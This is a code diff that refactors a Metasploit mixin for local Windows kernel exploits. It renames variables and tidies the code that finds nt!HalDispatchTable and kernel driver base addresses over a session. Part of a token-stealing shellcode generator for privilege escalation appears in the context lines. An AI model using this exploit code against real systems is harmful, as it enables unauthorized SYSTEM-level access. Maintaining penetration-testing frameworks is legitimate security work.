Cleanup the WindowsKernel mixin

lib/msf/core/exploit/local/windows_kernel.rb

@@ -2,7 +2,6 @@
 
 module Msf
 module Exploit::Local::WindowsKernel
-
   #
   # Find the address of nt!HalDispatchTable.
   #
@@ -12,24 +11,24 @@ module Exploit::Local::WindowsKernel
     kernel_info = find_sys_base(nil)
     vprint_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
 
-    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    if hKernel['return'] == 0
-      print_error("Failed to load #{kernel_info[1]} (error: #{hKernel['GetLastError']})")
+    h_kernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
+    if h_kernel['return'] == 0
+      print_error("Failed to load #{kernel_info[1]} (error: #{h_kernel['GetLastError']})")
       return nil
     end
-    hKernel = hKernel['return']
+    h_kernel = h_kernel['return']
 
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
-    if halDispatchTable['return'] == 0
-      print_error("Failed to retrieve the address of HalDispatchTable (error: #{halDispatchTable['GetLastError']})")
+    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(h_kernel, 'HalDispatchTable')
+    if hal_dispatch_table['return'] == 0
+      print_error("Failed to retrieve the address of nt!HalDispatchTable (error: #{hal_dispatch_table['GetLastError']})")
       return nil
     end
-    halDispatchTable = halDispatchTable['return']
+    hal_dispatch_table = hal_dispatch_table['return']
 
-    halDispatchTable -= hKernel
-    halDispatchTable += kernel_info[0]
-    vprint_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
-    halDispatchTable
+    hal_dispatch_table -= h_kernel
+    hal_dispatch_table += kernel_info[0]
+    vprint_status("HalDisPatchTable Address: 0x#{hal_dispatch_table.to_s(16)}")
+    hal_dispatch_table
   end
 
   #
@@ -48,28 +47,28 @@ module Exploit::Local::WindowsKernel
         'EnumDeviceDrivers',
         'BOOL',
         [
-          ["PBLOB", "lpImageBase", "out"],
-          ["DWORD", "cb", "in"],
-          ["PDWORD", "lpcbNeeded", "out"]
+          %w(PBLOB lpImageBase out),
+          %w(DWORD cb in),
+          %w(PDWORD lpcbNeeded out)
         ])
       session.railgun.add_function(
         'psapi',
         'GetDeviceDriverBaseNameA',
         'DWORD',
         [
-          ["LPVOID", "ImageBase", "in"],
-          ["PBLOB", "lpBaseName", "out"],
-          ["DWORD", "nSize", "in"]
+          %w(LPVOID ImageBase in),
+          %w(PBLOB lpBaseName out),
+          %w(DWORD nSize in)
         ])
     end
 
     results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("V*")
+    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack('V*')
 
     addresses.each do |address|
       results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
       current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname == nil
+      if drvname.nil?
         if current_drvname.downcase.include?('krnl')
           return [address, current_drvname]
         end
@@ -81,7 +80,8 @@ module Exploit::Local::WindowsKernel
 
   #
   # Generate x86 token stealing shellcode suitable for use when overwriting the
-  # halDispatchTable+0x4.
+  # pointer at nt!HalDispatchTable+0x4. The shellcode preserves the edx and ebx
+  # registers.
   #
   # @param target [Hash] The target information containing the offsets to _KPROCESS,
   #   _TOKEN, _UPID and _APLINKS.
@@ -108,6 +108,5 @@ module Exploit::Local::WindowsKernel
     tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
     tokenstealing
   end
-
 end
 end